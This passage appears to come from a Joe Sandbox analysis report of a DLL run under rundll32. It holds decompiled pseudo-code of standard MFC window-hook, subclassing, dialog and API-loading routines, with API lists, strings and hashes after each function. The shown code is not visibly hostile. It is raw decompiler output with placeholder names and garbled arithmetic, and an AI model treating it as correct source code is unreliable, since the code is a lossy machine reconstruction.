								 *0x1005a8dc = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E100199C1(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000FB9D(_t111, _t116, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
							__eflags = _t83 - E1001025C;
							if(_t83 != E1001025C) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000CEFC();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E1000A7E1(_t87, "ime");
						__eflags = _t88;
						_pop(_t97);
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10017C74(_t94, _t105, _t110);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 10011393

Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F

CallNextHookEx.USER32 ref: 100113D7

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

GetClassLongA.USER32 ref: 1001141B
GlobalGetAtomNameA.KERNEL32 ref: 10011445
SetWindowLongA.USER32 ref: 1001149A
_memset.LIBCMT ref: 100114E4
GetClassLongA.USER32 ref: 10011514
GetClassNameA.USER32(?,?,00000100), ref: 10011535
GetWindowLongA.USER32 ref: 10011559
GetPropA.USER32 ref: 10011573
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1001157E
GetPropA.USER32 ref: 10011586
GlobalAddAtomA.KERNEL32 ref: 1001158E
SetWindowLongA.USER32 ref: 1001159C
CallNextHookEx.USER32 ref: 100115B4
UnhookWindowsHookEx.USER32(?), ref: 100115C8

Strings

#32768, xrefs: 100114F6, 100114FB, 10011545
AfxOldWndProc423, xrefs: 1001156C, 10011571, 1001157C, 10011584, 1001158D
ime, xrefs: 1001144E

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000D6C3, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000D6C3() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x1005a76c; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x1005a750 = 0;
						 *0x1005a754 = 0;
						 *0x1005a758 = 0;
						 *0x1005a75c = 0;
						 *0x1005a760 = 0;
						 *0x1005a764 = 0;
						 *0x1005a768 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x1005a750 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x1005a754 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x1005a758 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x1005a75c = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x1005a764 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x1005a760 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x1005a768 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x1005a76c = 1;
					return _t5;
				} else {
					_t24 =  *0x1005a760; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,745F5D80,1000D80F,?,?,?,?,?,?,?,1000F61E,00000000,00000002,00000028), ref: 1000D6EC
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 1000D708
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 1000D719
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000D72A
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000D73B
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000D74C
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000D75D
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 1000D76E

Strings

EnumDisplayDevicesA, xrefs: 1000D768
EnumDisplayMonitors, xrefs: 1000D746
GetSystemMetrics, xrefs: 1000D702
GetMonitorInfoA, xrefs: 1000D757
MonitorFromWindow, xrefs: 1000D713
USER32, xrefs: 1000D6E2
MonitorFromRect, xrefs: 1000D724
MonitorFromPoint, xrefs: 1000D735

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction ID: 93615fb53cb164fe7f3d347b700eade87a81924dee4312457033af375ccc55a3
Opcode Fuzzy Hash: ee0e5f062bbe94e4a9e7c06d78520802f13055058268d31d10b74b4948bb3027
Instruction Fuzzy Hash: 7921E3B19097699BE701EF369DC856DBAF5F34F281391453FE109D2528EB3884C6EE20

Uniqueness

Uniqueness Score: -1.00%

Function 1000F530, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 176
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000F530(void* __ebx, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				struct tagRECT _v80;
				char _v100;
				void* __edi;
				intOrPtr _t58;
				struct HWND__* _t59;
				intOrPtr _t94;
				signed int _t103;
				struct HWND__* _t104;
				void* _t105;
				struct HWND__* _t107;
				long _t108;
				long _t116;
				void* _t119;
				struct HWND__* _t121;
				void* _t123;
				intOrPtr _t125;
				intOrPtr _t129;

				_t119 = __edx;
				_t105 = __ebx;
				_t125 = __ecx;
				_v12 = __ecx;
				_v8 = E10012862(__ecx);
				_t58 = _a4;
				if(_t58 == 0) {
					if((_v8 & 0x40000000) == 0) {
						_t59 = GetWindow( *(__ecx + 0x20), 4);
					} else {
						_t59 = GetParent( *(__ecx + 0x20));
					}
					_t121 = _t59;
					if(_t121 != 0) {
						_t104 = SendMessageA(_t121, 0x36b, 0, 0);
						if(_t104 != 0) {
							_t121 = _t104;
						}
					}
				} else {
					_t4 = _t58 + 0x20; // 0xc033d88b
					_t121 =  *_t4;
				}
				_push(_t105);
				GetWindowRect( *(_t125 + 0x20),  &_v60);
				if((_v8 & 0x40000000) != 0) {
					_t107 = GetParent( *(_t125 + 0x20));
					GetClientRect(_t107,  &_v28);
					GetClientRect(_t121,  &_v44);
					MapWindowPoints(_t121, _t107,  &_v44, 2);
				} else {
					if(_t121 != 0) {
						_t103 = GetWindowLongA(_t121, 0xfffffff0);
						if((_t103 & 0x10000000) == 0 || (_t103 & 0x20000000) != 0) {
							_t121 = 0;
						}
					}
					_v100 = 0x28;
					if(_t121 != 0) {
						GetWindowRect(_t121,  &_v44);
						E1000D86F(_t121, E1000D804(_t121, 2),  &_v100);
						CopyRect( &_v28,  &_v80);
					} else {
						_t94 = E1000A7CE();
						if(_t94 != 0) {
							_t94 =  *((intOrPtr*)(_t94 + 0x20));
						}
						E1000D86F(_t121, E1000D804(_t94, 1),  &_v100);
						CopyRect( &_v44,  &_v80);
						CopyRect( &_v28,  &_v80);
					}
				}
				_t108 = _v60.left;
				asm("cdq");
				_t123 = _v60.right - _t108;
				asm("cdq");
				_t120 = _v44.bottom;
				_t116 = (_v44.left + _v44.right - _t119 >> 1) - (_t123 - _t119 >> 1);
				_a4 = _v60.bottom - _v60.top;
				asm("cdq");
				asm("cdq");
				_t129 = (_v44.top + _v44.bottom - _v44.bottom >> 1) - (_a4 - _t120 >> 1);
				if(_t116 >= _v28.left) {
					if(_t123 + _t116 > _v28.right) {
						_t116 = _t108 - _v60.right + _v28.right;
					}
				} else {
					_t116 = _v28.left;
				}
				if(_t129 >= _v28.top) {
					if(_a4 + _t129 > _v28.bottom) {
						_t129 = _v60.top - _v60.bottom + _v28.bottom;
					}
				} else {
					_t129 = _v28.top;
				}
				return E1001297A(_v12, 0, _t116, _t129, 0xffffffff, 0xffffffff, 0x15);
			}

APIs

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

GetParent.USER32(?), ref: 1000F55D
SendMessageA.USER32 ref: 1000F580
GetWindowRect.USER32 ref: 1000F59A
GetWindowLongA.USER32 ref: 1000F5B0
CopyRect.USER32 ref: 1000F5FD
CopyRect.USER32 ref: 1000F607
GetWindowRect.USER32 ref: 1000F610
CopyRect.USER32 ref: 1000F62C

Strings

(, xrefs: 1000F5C8

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Rect$Window$Copy$Long$MessageParentSend
String ID: (
API String ID: 808654186-3887548279
Opcode ID: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction ID: 3f3129d87232bc90929dbfd76231b55f7e5f3d8dd267dcccc126c4261812b80e
Opcode Fuzzy Hash: 7a74a446788f1e642fa1c3aef1600eb5c5d71207166799e974e91dfaab450861
Instruction Fuzzy Hash: 84517072900619AFEB00DFA8CC85EEEBBB9EF48290F154119FA05F3594DB30ED419B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1F9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A1F9(intOrPtr* __ecx, void* __esi, intOrPtr _a4) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				_Unknown_base(*)()* _t9;
				struct HINSTANCE__* _t15;
				void* _t16;
				intOrPtr* _t18;
				char _t19;
				intOrPtr _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;

				_t16 = __esi;
				_t12 = __ecx;
				_t18 = __ecx;
				 *__ecx = _a4;
				_a4 = 0;
				_t19 =  *0x10058f2c; // 0x0
				if(_t19 == 0) {
					_t15 = GetModuleHandleA("KERNEL32");
					_t20 = _t15;
					if(_t15 == 0) {
						L2:
						E1000A0DB(0, _t12, _t15, _t16, _t20);
					}
					 *0x10058f1c = GetProcAddress(_t15, "CreateActCtxA");
					 *0x10058f20 = GetProcAddress(_t15, "ReleaseActCtx");
					 *0x10058f24 = GetProcAddress(_t15, "ActivateActCtx");
					_t9 = GetProcAddress(_t15, "DeactivateActCtx");
					_t21 =  *0x10058f1c; // 0x0
					 *0x10058f28 = _t9;
					_t16 = _t16;
					if(_t21 == 0) {
						__eflags =  *0x10058f20; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x10058f24; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t9;
								if(__eflags != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t22 =  *0x10058f20; // 0x0
						if(_t22 == 0) {
							goto L2;
						} else {
							_t23 =  *0x10058f24; // 0x0
							if(_t23 == 0) {
								goto L2;
							} else {
								_t20 = _t9;
								if(_t9 == 0) {
									goto L2;
								}
							}
						}
					}
					 *0x10058f2c = 1;
				}
				return _t18;
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1000ACB1,000000FF), ref: 1000A21B
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 1000A239
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 1000A246
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 1000A253
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1000A260

Strings

CreateActCtxA, xrefs: 1000A233
ActivateActCtx, xrefs: 1000A248
KERNEL32, xrefs: 1000A216
DeactivateActCtx, xrefs: 1000A255
ReleaseActCtx, xrefs: 1000A23B

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction ID: c20c66116e7296d4a0afd5037f2dffc74684b1862cb446d2da729e570b87d5d5
Opcode Fuzzy Hash: 8958f846425cfb9847c1ef030b437731261e480fa3a980f3a7b160ae38ca1aab
Instruction Fuzzy Hash: 3611C076C04266EBFB10DFA9ACC45097BE5E74F2D8301423FEA05A2124D7720980CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB74, Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1000CB74(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed short _t71;
				signed int _t84;
				void* _t94;
				struct HINSTANCE__* _t96;
				signed int _t97;
				void* _t98;
				signed int _t100;
				void* _t101;
				void* _t102;

				_t102 = __eflags;
				_t94 = __edx;
				_push(0x24);
				E10017BF4(E10028029, __ebx, __edi, __esi);
				_t100 = __ecx;
				 *((intOrPtr*)(_t101 - 0x20)) = __ecx;
				 *(_t101 - 0x1c) =  *(__ecx + 0x60);
				 *(_t101 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E1000D5EC(__ebx, __edi, __ecx, _t102);
				_t96 =  *(_t54 + 0xc);
				_t84 = 0;
				_t103 =  *(_t100 + 0x58);
				if( *(_t100 + 0x58) != 0) {
					_t96 =  *(E1000D5EC(0, _t96, _t100, _t103) + 0xc);
					_t54 = LoadResource(_t96, FindResourceA(_t96,  *(_t100 + 0x58), 5));
					 *(_t101 - 0x18) = _t54;
				}
				if( *(_t101 - 0x18) != _t84) {
					_t54 = LockResource( *(_t101 - 0x18));
					 *(_t101 - 0x1c) = _t54;
				}
				if( *(_t101 - 0x1c) != _t84) {
					_t86 = _t100;
					 *(_t101 - 0x14) = E1000C6AC(_t84, _t100, __eflags);
					E1000FC04(_t84, _t96, __eflags);
					 *(_t101 - 0x28) =  *(_t101 - 0x28) & _t84;
					__eflags =  *(_t101 - 0x14) - _t84;
					 *(_t101 - 0x2c) = _t84;
					 *(_t101 - 0x24) = _t84;
					if(__eflags != 0) {
						__eflags =  *(_t101 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t101 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t101 - 0x14), 0);
								 *(_t101 - 0x2c) = 1;
								_t84 = E1000A7CE();
								__eflags = _t84;
								 *(_t101 - 0x24) = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x120))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E100128F8(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E10012913(_t84, 0);
											 *(_t101 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) & 0x00000000;
					E100115DC(_t96, __eflags, _t100);
					_t58 = E1000FB5C(_t84, _t86, _t101,  *(_t101 - 0x14));
					_push(_t96);
					_push(_t58);
					_push( *(_t101 - 0x1c));
					_t59 = E1000C984(_t84, _t100, _t94, _t96, _t100, __eflags);
					_t97 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t100 + 0x3c) & 0x00000010;
						if(( *(_t100 + 0x3c) & 0x00000010) != 0) {
							_t98 = 4;
							_t71 = E10012862(_t100);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t98 = 5;
							}
							E1000F6F2(_t100, _t98);
							_t97 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E1001297A(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E10012913(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E1000C6E6(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E10017C60(_t63);
				}
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1000CB7B
FindResourceA.KERNEL32(?,?,00000005), ref: 1000CBAE
LoadResource.KERNEL32(?,00000000), ref: 1000CBB6
LockResource.KERNEL32(?,00000024,100014EC,00000000,CBF72908), ref: 1000CBC7
GetDesktopWindow.USER32 ref: 1000CBFA
IsWindowEnabled.USER32(?), ref: 1000CC08
EnableWindow.USER32(?,00000000), ref: 1000CC17

Part of subcall function 100128F8: IsWindowEnabled.USER32(?), ref: 10012901

Part of subcall function 10012913: EnableWindow.USER32(?,CBF72908), ref: 10012920

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,CBF72908), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,CBF72908), ref: 1000CD28

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
String ID:
API String ID: 1509511306-0
Opcode ID: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction ID: 8f78f448105f665873ac1cd7b5fa33a3343bcf420d8a1ae80c8a79bff85a7528
Opcode Fuzzy Hash: 79ae930f89578103c1460a1015ac81056dc0f6867cd803f5cb3b8be9090631d6
Instruction Fuzzy Hash: A251BF34A007098BFF11DFA5C999EAEBBF1EF44781F20002EE506A6195CB759E41CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10011245, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10011245(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t60;
				void* _t64;
				struct HWND__* _t66;
				CHAR* _t68;
				void* _t71;

				_t64 = __edx;
				_t60 = __ecx;
				_push(0x40);
				E10017BF4(E1002864B, __ebx, __edi, __esi);
				_t66 =  *(_t71 + 8);
				_t68 = "AfxOldWndProc423";
				_t31 = GetPropA(_t66, _t68);
				 *(_t71 - 0x14) =  *(_t71 - 0x14) & 0x00000000;
				 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
				 *(_t71 - 0x18) = _t31;
				_t58 = 1;
				_t33 =  *(_t71 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E1000FB5C(1, _t60, _t71,  *(_t71 + 0x14));
					E10011159(_t60, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t58 = 0 | E100111CF(1, _t66, E1000FB5C(1, _t60, _t71, _t66),  *(_t71 + 0x14),  *(_t71 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t58 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t66, 0xfffffffc,  *(_t71 - 0x18));
							RemovePropA(_t66, _t68);
							GlobalDeleteAtom(GlobalFindAtomA(_t68));
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66,  *(_t71 + 0xc),  *(_t71 + 0x10),  *(_t71 + 0x14));
							} else {
								E1000E865(E1000FB5C(1, _t60, _t71, _t66), _t71 - 0x30, _t71 - 0x1c);
								 *(_t71 - 0x14) = CallWindowProcA( *(_t71 - 0x18), _t66, 0x110,  *(_t71 + 0x10),  *(_t71 + 0x14));
								E100100F3(1, _t64, _t49, _t71 - 0x30,  *((intOrPtr*)(_t71 - 0x1c)));
							}
						}
					}
				}
				return E10017C60( *(_t71 - 0x14));
			}

APIs

__EH_prolog3_catch.LIBCMT ref: 1001124C
GetPropA.USER32 ref: 1001125B
CallWindowProcA.USER32 ref: 100112B5

Part of subcall function 100100F3: GetWindowRect.USER32 ref: 1001011B
Part of subcall function 100100F3: GetWindow.USER32(?,00000004), ref: 10010138

SetWindowLongA.USER32 ref: 100112DC
RemovePropA.USER32 ref: 100112E4
GlobalFindAtomA.KERNEL32 ref: 100112EB
GlobalDeleteAtom.KERNEL32 ref: 100112F2

Part of subcall function 1000E865: GetWindowRect.USER32 ref: 1000E871

CallWindowProcA.USER32 ref: 10011346

Strings

AfxOldWndProc423, xrefs: 10011254, 10011259, 100112E2, 100112EA

Memory Dump Source

Source File: 00000003.00000002.655723008.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.655712239.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655846568.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.655871877.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.655929186.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655981299.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.655996960.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
String ID: AfxOldWndProc423
API String ID: 2702501687-1060338832
Opcode ID: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction ID: 0d19250562dc5a9dad551a697ef26f9b08052b09a3581b526b6705a222a2b98b
Opcode Fuzzy Hash: 8fd6b985b15a6b43d9e50dafe11c9ce611adcf5e5826660702256a507342a875
Instruction Fuzzy Hash: 2D317F7680021ABBDF05DFA0CD89EFF7FB9FF05651F100118F611A6051DB359A61ABA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C984, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E1000C984(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t65;
				signed int _t72;
				signed int _t74;
				struct HWND__* _t75;
				signed int _t78;
				signed int _t95;
				intOrPtr* _t103;
				signed int _t110;
				void* _t124;
				signed int _t129;
				DLGTEMPLATE* _t130;
				struct HWND__* _t131;
				void* _t132;

				_t128 = __esi;
				_t124 = __edx;
